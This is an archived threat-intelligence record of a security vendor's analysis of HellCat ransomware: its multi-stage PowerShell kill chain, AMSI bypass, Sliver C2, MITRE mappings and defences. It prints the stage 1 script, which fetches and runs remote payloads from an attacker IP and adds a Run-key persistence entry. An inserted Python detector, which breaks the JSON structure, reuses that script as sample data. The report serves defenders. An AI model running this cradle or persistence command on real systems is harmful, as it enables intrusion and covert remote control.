{
	"id": "2fb154a2-575e-4bd1-894e-f54ea0c1fab5",
	"created_at": "2026-04-06T00:21:23.585848Z",
	"updated_at": "2026-04-10T03:23:40.385105Z",
	"deleted_at": null,
	"sha1_hash": "0d230dcdf198c2c92d5f39f24ef9d496bc20252d",
	"title": "HellCat Ransomware: Exposing the TTPs of a Rising Ransomware Threat in 2025",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 272047,
	"plain_text": "HellCat Ransomware: Exposing the TTPs of a Rising Ransomware\r\nThreat in 2025\r\nBy Sıla Özeren Hacıoğlu\r\nPublished: 2025-03-13 · Archived: 2026-04-05 17:31:33 UTC\r\nHellCat Ransomware is a prominent ransomware group that emerged in mid-2024, specializing in targeted cyber\r\nextortion and data exfiltration operations. The group primarily leverages sophisticated phishing tactics, often\r\ndistributing malicious email attachments and exploiting vulnerabilities in exposed systems to gain initial access.\r\nUpon successful infiltration, HellCat aggressively exfiltrates sensitive data, employing psychological tactics and\r\npublic pressure to compel victims into paying ransoms. The group's operations frequently overlap with the\r\nMorpheus ransomware, indicating possible shared tooling or affiliate relationships.\r\nIn this analysis, we examine the tactics, techniques, and procedures (TTPs) employed by the HellCat ransomware\r\ngroup, providing detailed insights into their methods of compromise, lateral movement, data exfiltration strategies,\r\nand recommended defensive measures to mitigate their threat.\r\nMalware Kill Chain of HellCat Ransomware\r\nBelow is a concise overview of the malware kill chain used by HellCat ransomware [1]. This breakdown details\r\nthe infection's sequential stages—from initial access to command-and-control establishment—showing how each\r\ncomponent evades detection and maintains persistence. \r\nFor more in-depth explanations of the tactics, techniques, and procedures (TTPs) used by HellCat ransomware,\r\nsee the following section.\r\nStage 1 – Initial Access\r\nS1.ps1: This initiating PowerShell script masquerades as an executable and establishes persistence by\r\nadding a registry key. 
It then connects to a malicious open directory to download subsequent payloads.\r\nFigure 1: VirusTotal analysis for S1.ps1.\r\nStage 2 – Secondary Payloads\r\nPayload.ps1: Once downloaded by S1.ps1, it serves as the conduit to fetch further scripts.\r\nhttps://www.picussecurity.com/resource/blog/hellcat-ransomware\r\nPage 1 of 7\n\nIsma.ps1: Executed alongside Payload.ps1, this script bypasses the Antimalware Scan Interface (AMSI) to\r\nhelp evade detection.\r\nStage 3 – Final Script Download\r\nShellcode.ps1: This script downloads the final command-and-control payload and executes it directly in memory\r\nusing reflective code loading.\r\nStage 4 – C2 Establishment\r\nStager.woff: This final payload, a shellcode variant of SliverC2, is executed to establish persistence and\r\ncreate a command-and-control channel on the victim system.\r\nFigure 2: VirusTotal analysis for Stager.woff.\r\nAnalyzing HellCat Ransomware's Advanced Tactics, Techniques, and Procedures (TTPs)\r\nThis section provides a comprehensive analysis of these TTPs, offering insights into how HellCat Ransomware\r\noperates and the tools they employ.\r\nInitial Access Methods\r\nT1566.001 - Phishing: Spearphishing Attachment\r\nHellCat operators have used spearphishing emails with malicious attachments to gain initial access to target\r\nsystems.\r\nT1190 - Exploit Public-Facing Application\r\nThe group also targets vulnerabilities in exposed systems such as Atlassian Jira. By leveraging zero-day\r\nvulnerabilities, they bypass perimeter defenses and gain stealthy remote access and control [2]. 
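The stage 1 behaviour in the kill chain above (a Run key that re-launches a hidden PowerShell, which pulls the next stage from an open directory) is concrete enough to hunt for. The following Python is an added example, not code from the Picus post or from the HellCat tooling. It scores Sysmon-style events (EventID 13 registry value set, EventID 1 process creation) for the combination of Run-key persistence, a hidden window, download-and-execute cradle tokens and URLs pointing at raw IP addresses. The events are constructed inline: the first reproduces the Run-key value data that the stage 1 script in the Execution and Persistence section below writes (using the payload host from that script), while the OneDrive and backup.ps1 entries, the user SID, the -EncodedCommand variant, the threshold and the scoring weights are assumptions made for this example.

```python
import re

BS = chr(92)  # one backslash, spelled out so this file contains no escape sequences
DQ = chr(34)  # one double-quote character, for the same reason

# Sysmon EventID 13 (registry value set) TargetObject tails that mean logon persistence.
RUN_KEY_TAILS = ('currentversion' + BS + 'run' + BS,
                 'currentversion' + BS + 'runonce' + BS)

PS_BINARY = re.compile('(?<![a-z])(?:powershell|pwsh)(?:[.]exe)?(?![a-z])', re.I)
# -w 1 / -w hidden / -windowstyle hidden, with either - or / as the switch prefix.
HIDDEN_WINDOW = re.compile('(?:^|[ ])[-/](?:w|windowstyle)[ ]+(?:1|hidden)(?![a-z0-9])', re.I)
# Download-and-execute cradle tokens; long names listed before their aliases.
CRADLE = re.compile('(?<![a-z0-9])(invoke-webrequest|iwr|invoke-command|icm|'
                    'invoke-expression|iex|downloadstring|downloadfile|'
                    '-encodedcommand|-enc)(?![a-z0-9])', re.I)
URL = re.compile('https?://[^ )]+', re.I)
RAW_IP_URL = re.compile('https?://[0-9]+(?:[.][0-9]+){3}(?::[0-9]+)?', re.I)


def score_command_line(cmd):
    '''Score one command line (or Run-key value data); returns (score, reasons).'''
    score, reasons = 0, []
    if PS_BINARY.search(cmd):
        score += 1
        reasons.append('launches PowerShell (T1059.001)')
    if HIDDEN_WINDOW.search(cmd):
        score += 2
        reasons.append('hidden window')
    tokens = sorted({m.group(1).lower() for m in CRADLE.finditer(cmd)})
    if tokens:
        score += 2 * len(tokens)
        reasons.append('download/execute cradle tokens: ' + ', '.join(tokens))
    if '[scriptblock]::create' in cmd.lower():
        score += 1
        reasons.append('ScriptBlock::Create over fetched content')
    raw = RAW_IP_URL.search(cmd)
    if raw:
        score += 2
        reasons.append('URL to a raw IP address: ' + raw.group(0))
    elif URL.search(cmd):
        score += 1
        reasons.append('embedded URL: ' + URL.search(cmd).group(0))
    return score, reasons


def analyze_event(event, threshold=5):
    '''Return a finding dict for one Sysmon-style event, or None if below threshold.'''
    score, reasons = 0, []
    if event['EventID'] == 13:
        target = event['TargetObject'].lower()
        if not any(tail in target for tail in RUN_KEY_TAILS):
            return None  # only Run/RunOnce values are in scope here
        score += 3
        reasons.append('Run key persistence (T1547.001): ' + event['TargetObject'])
        cmd = event['Details']
    elif event['EventID'] == 1:
        cmd = event['CommandLine']
    else:
        return None
    s, r = score_command_line(cmd)
    score += s
    reasons += r
    if score < threshold:
        return None
    return {'EventID': event['EventID'], 'score': score, 'reasons': reasons, 'command': cmd}


def triage(events, threshold=5):
    '''Run analyze_event over a list of events and keep only the findings.'''
    return [f for f in (analyze_event(e, threshold) for e in events) if f]


# The Run-key value data the stage 1 script on this page writes (the quoted powershell.exe
# path, /w 1 /c and the iwr/icm cradle), with the payload host from that script.
# Everything else below is constructed for this example.
STAGE1_RUN_VALUE = (
    DQ + BS.join(['C:', 'Windows', 'System32', 'WindowsPowerShell', 'v1.0', 'powershell.exe']) + DQ
    + ' /w 1 /c ' + DQ
    + 'icm -scriptblock $([ScriptBlock]::Create([System.Text.Encoding]::UTF8.getString('
    + '(iwr http://45.200.148.157:8878/payload.ps1).content)))' + DQ)

USER_HIVE = BS.join(['HKU', 'S-1-5-21-1111-2222-3333-1001'])  # constructed SID

SAMPLE_EVENTS = [
    {'EventID': 13, 'TargetObject': BS.join([USER_HIVE, 'Software', 'Microsoft', 'Windows',
                                             'CurrentVersion', 'Run', 'maintenance']),
     'Details': STAGE1_RUN_VALUE},
    {'EventID': 13, 'TargetObject': BS.join([USER_HIVE, 'Software', 'Microsoft', 'Windows',
                                             'CurrentVersion', 'Run', 'OneDrive']),
     'Details': BS.join(['C:', 'Users', 'alice', 'AppData', 'Local', 'Microsoft',
                         'OneDrive', 'OneDrive.exe']) + ' /background'},
    # A different cradle shape than the page shows: hidden window plus -EncodedCommand
    # (SQBFAFgA is the UTF-16LE base64 of just IEX, a constructed stub).
    {'EventID': 1, 'CommandLine': 'powershell.exe -nop -w hidden -enc SQBFAFgA'},
    {'EventID': 1, 'CommandLine': 'powershell.exe -NoProfile -ExecutionPolicy Bypass -File '
                                  + BS.join(['C:', 'Scripts', 'backup.ps1'])},
]

if __name__ == '__main__':
    for finding in triage(SAMPLE_EVENTS):
        print('EventID', finding['EventID'], 'score', finding['score'])
        for reason in finding['reasons']:
            print('  -', reason)
```

Run with python3 and the two flagged events print with their reasons. The weights are deliberately simple: a Run key on its own (score 3) stays below the threshold of 5, because many legitimate products register there, but a Run key whose data launches a hidden PowerShell with a cradle scores far above it, and the -EncodedCommand variant lands exactly on the threshold. score_command_line applies equally to the ScriptBlockText field of PowerShell Event ID 4104 records, which matters here because the stage 1 cradle runs its downloaded stages through ScriptBlock::Create rather than as files on disk.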
\r\nExecution and Persistence\r\nUpon gaining access, HellCat uses a multi-stage PowerShell chain to execute its payloads and maintain persistence.\r\nT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nAs noted above, HellCat operators rely on multi-stage PowerShell infection chains to execute their malware\r\nand maintain access on victim systems. These chains begin with an initial PowerShell script, the stage 1\r\npayload, which establishes persistence and contacts attacker infrastructure for next-stage payloads. The stage 1\r\nscript reads:\r\n$pspath = (get-command powershell).source;\r\n$pspath = '\"' + $pspath + '\" /w 1 /c \"icm -scriptblock $([ScriptBlock]::Create([System.Text.Encoding]::UTF8.getString((iwr http://45.200.148.157:8878/payload.ps1).content)))\"'\r\nicm -scriptblock $([ScriptBlock]::Create([System.Text.Encoding]::UTF8.getString((iwr http://45.200.148.157:8878/payload2.ps1).content)))\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v maintenance /t REG_SZ /d $pspath /f\r\nThe script first resolves the path of powershell.exe and builds a command line that launches it with a hidden\r\nwindow (/w 1) and an in-memory download-and-execute cradle: iwr fetches payload.ps1 from the attackers' open\r\ndirectory, the response bytes are decoded as UTF-8 text and wrapped in a ScriptBlock, and icm executes it, so the\r\ndownloaded script never touches disk. It then runs the same cradle immediately against payload2.ps1 to fetch and\r\nexecute the stage 2 payload, and finally writes the prepared command line to the Windows Registry Run key under\r\nHKCU\\...\\Run as a value named “maintenance”, ensuring the cradle runs again each time the user logs in.\r\nT1620: Reflective Code Loading\r\nHellCat’s infection chain employs reflective code loading to run malicious code in memory and evade\r\nfile-based security controls. \r\nIn later stages of the PowerShell chain, the stage 3 payload downloads the final payload and injects it directly into\r\nmemory rather than writing it to disk. 
By loading shellcode or DLLs reflectively, HellCat can execute its\r\nransomware or C2 agent without leaving a traditional file trace, thereby evading antivirus file scans. \r\nThe stage 3 payload in HellCat’s chain fetched a shellcode payload (stager.woff), a memory-resident\r\nvariant of the SliverC2 backdoor, and executed it within the PowerShell process.\r\nT1562.001: Impair Defenses: Disable or Modify Tools\r\nTo execute its PowerShell-based malware unobstructed, HellCat bypasses the Antimalware Scan Interface\r\n(AMSI), thereby disabling or weakening security tool inspection. Analysis of HellCat’s scripts shows a\r\nfurther stage 2 payload (isma.ps1) dedicated to an AMSI bypass.\r\nThis script alters the AMSI scanning mechanism so that malicious scripts can run without being flagged by\r\nWindows Defender or other AMSI-integrated security solutions. \r\nBy modifying AMSI’s behavior in memory (a common malware technique), HellCat ensures its subsequent\r\npayloads (the reflective loader and the Sliver backdoor) execute unhindered. In practice, once the AMSI bypass\r\nscript runs, the PowerShell process can load and run heavily obfuscated or malicious code (for example, decoding\r\nand invoking shellcode) without triggering the host’s anti-malware defenses.\r\nCommand-and-Control (C2)\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nDeploying the SliverC2 Framework for Command and Control (C2)\r\nHellCat has been observed deploying a complex infection chain that culminates in the memory-resident execution\r\nof Sliver implants. The final stage begins with the stage 3 PowerShell script, which downloads, decrypts,\r\nand executes a Sliver payload. \r\nThis script, often hosted on the group’s own infrastructure, triggers the final stage of the attack. 
The final payload\r\nincludes the shellcode needed to inject and initialize the Sliver implant directly within the victim machine’s\r\nmemory space, bypassing traditional detection mechanisms. This memory-based payload execution enables the\r\nattackers to establish a command-and-control channel that remains concealed from many endpoint defenses,\r\nproviding them with persistent access and the ability to remotely manage compromised systems. \r\nPrivilege Escalation and Lateral Movement\r\nAnalyses of HellCat intrusions show that the group relies on “living off the land” binaries and everyday,\r\nlow-profile administrative tools for this phase of its operations. Rather than deploying additional custom malware,\r\nHellCat uses common utilities like Netcat and Netscan to navigate within networks. \r\nThis approach allows the attackers to discreetly discover internal networks, pivot between systems, and transfer\r\ndata. Since these tools are legitimate and commonly found in many IT environments, they let the attackers\r\nblend in and avoid triggering alarms.\r\nBelow are the MITRE ATT\u0026CK techniques mapped to this phase of HellCat ransomware operations.\r\nT1046: Network Service Discovery: Using tools such as Netscan to map out the network and identify\r\npotential targets for lateral movement.\r\nT1218: System Binary Proxy Execution (formerly Signed Binary Proxy Execution): Using common, trusted\r\nbinaries (such as Netscan) to execute malicious actions, helping them blend into the environment and evade\r\ndetection.\r\nT1021: Remote Services: Leveraging legitimate remote utilities, like Netcat, to establish communication\r\nchannels and move laterally within the victim’s infrastructure.\r\nT1078: Valid Accounts: Employing credentials (either stolen or default) to authenticate and operate under\r\nthe guise of legitimate users, further aiding stealth and lateral movement.\r\nData Exfiltration and Extortion\r\nHellCat's operations are 
characterized by:\r\nDouble Extortion Tactics\r\nHellCat’s approach follows a common model in modern ransomware attacks: the group first infiltrates a target\r\nnetwork to exfiltrate sensitive data (often in bulk) and then encrypts the systems. This two-pronged strategy\r\nincreases pressure on victims since, even if they restore their systems, the stolen data may still be leaked or sold if\r\nthe ransom isn’t paid.\r\nEmploying Attention-Grabbing Demands to Apply Pressure\r\nWhat sets HellCat apart is its deliberate use of attention-grabbing demands to pressure victims. \r\nA widely reported incident involved Schneider Electric, where the attackers not only stole more than 40 GB of\r\ncompressed data (including projects, issues, and over 400,000 rows of user information) but also demanded a\r\nransom of $125,000 in “baguettes” [3]. This culturally resonant request is designed to heighten public scrutiny and\r\ncause reputational harm to its targets, adding a psychological dimension to the extortion strategy.\r\nRansomware Payload Characteristics\r\nUnaltered File Extensions\r\nSome preliminary reports have mentioned that HellCat ransomware might not change file extensions after\r\nencryption, but there is no broad, corroborated evidence from multiple sources confirming this behavior. The\r\nclaim deviates from common ransomware patterns, so validation from additional threat intelligence reports\r\nwould be advisable before relying on it (for example, in detection rules keyed on renamed files).\r\nShared Codebase with Other Ransomware\r\nSeveral analyses have noted significant overlaps between HellCat and Morpheus ransomware payloads [4],\r\nsuggesting they may share a common builder or that there is some level of collaboration between affiliates. 
This\r\nobservation is supported by comparisons of code similarities noted in reputable cybersecurity reports.\r\nHow Does Picus Help Against the HellCat Ransomware as a Service (RaaS) Group?\r\nWe strongly suggest simulating ransomware groups to test the effectiveness of your security controls against their\r\nattacks using the Picus Security Validation Platform.\r\nPicus Threat Library includes the following threats for HellCat Ransomware attacks.\r\nThreat ID | Threat Name                        | Attack Module\r\n27847     | HellCat Ransomware Download Threat | Network Infiltration\r\n91292     | HellCat Ransomware Email Threat    | Email Infiltration\r\nDefense Strategies Against HellCat Ransomware Attacks\r\nTo mitigate the impact of HellCat Ransomware attacks, organizations should adopt a layered defense approach:\r\nDeploy Advanced Endpoint Detection and Response (EDR) Solutions\r\nInvest in robust EDR tools that continuously monitor endpoints for suspicious activities, such as abnormal\r\nPowerShell usage (hidden windows, download cradles, in-memory script execution) or unexpected script\r\nexecutions, and provide real-time remediation. Early detection helps contain threats before they spread.\r\nContinuously Test and Validate Security Controls\r\nGiven the evolving tactics of HellCat ransomware, organizations must regularly assess the effectiveness of their\r\ndefenses. Use Breach and Attack Simulation (BAS) solutions, such as the Picus Security Control Validation (SCV)\r\nsolution, to emulate real-world attack scenarios, ranging from initial phishing attempts and exploitation of\r\npublic-facing applications to the deployment of malicious PowerShell scripts and command-and-control (C2)\r\ncommunications. These proactive tests help identify control gaps and provide actionable recommendations to\r\nstrengthen your security posture.\r\nImplement Network Segmentation and a Zero Trust Model\r\nSegment your network to limit lateral movement in the event of a breach. 
Embrace a Zero Trust security model\r\nthat continuously verifies every user and device, ensuring that even if an attacker gains access, the damage is\r\ncontained within a limited segment of your network.\r\nMaintain Regular, Immutable Offline Backups and an Incident Response Plan\r\nEnsure that critical data is backed up regularly and stored offline in an immutable format to prevent tampering\r\nduring an attack. Develop and routinely test an incident response plan that clearly outlines roles, responsibilities,\r\nand procedures for rapid containment, eradication, and recovery in the event of a ransomware incident.\r\nReferences\r\n[1] N. Richards, “Who are Hellcat Ransomware Group?,” Bridewell, Feb. 28, 2025. Available:\r\nhttps://www.bridewell.com/insights/blogs/detail/who-are-hellcat-ransomware-group. [Accessed: Mar. 12, 2025]\r\n[2] J. Lyons, “Baguette bandits strike again with ransomware and a side of mockery,” The Register, Jan. 28, 2025.\r\nAvailable: https://www.theregister.com/2025/01/28/baguettes_bandits_strike_again/. [Accessed: Mar. 10, 2025]\r\n[3] D. Winder, “Ransomware Gang Demands $125,000 Payment In French Bread And Crypto,” Forbes, Nov. 06, 2024.\r\nAvailable: https://www.forbes.com/sites/daveywinder/2024/11/06/ransomware-gang-demands-125000-payment-in-french-bread-and-crypto/. [Accessed: Mar. 12, 2025]\r\n[4] “HellCat, Morpheus RaaS operations leverage similar payloads,” SC Media, Jan. 24, 2025. Available:\r\nhttps://www.scworld.com/brief/hellcat-morpheus-raas-operations-leverage-similar-payloads. [Accessed: Mar. 12, 2025]\r\nSource: https://www.picussecurity.com/resource/blog/hellcat-ransomware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.picussecurity.com/resource/blog/hellcat-ransomware"
	],
	"report_names": [
		"hellcat-ransomware"
	],
	"threat_actors": [
		{
			"id": "a602818a-34da-445f-9bac-715cc9b47a3d",
			"created_at": "2025-07-12T02:04:58.190857Z",
			"updated_at": "2026-04-10T02:00:03.850831Z",
			"deleted_at": null,
			"main_name": "GOLD PUMPKIN",
			"aliases": [
				"HellCat"
			],
			"source_name": "Secureworks:GOLD PUMPKIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434883,
	"ts_updated_at": 1775791420,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0d230dcdf198c2c92d5f39f24ef9d496bc20252d.pdf",
		"text": "https://archive.orkl.eu/0d230dcdf198c2c92d5f39f24ef9d496bc20252d.txt",
		"img": "https://archive.orkl.eu/0d230dcdf198c2c92d5f39f24ef9d496bc20252d.jpg"
	}
}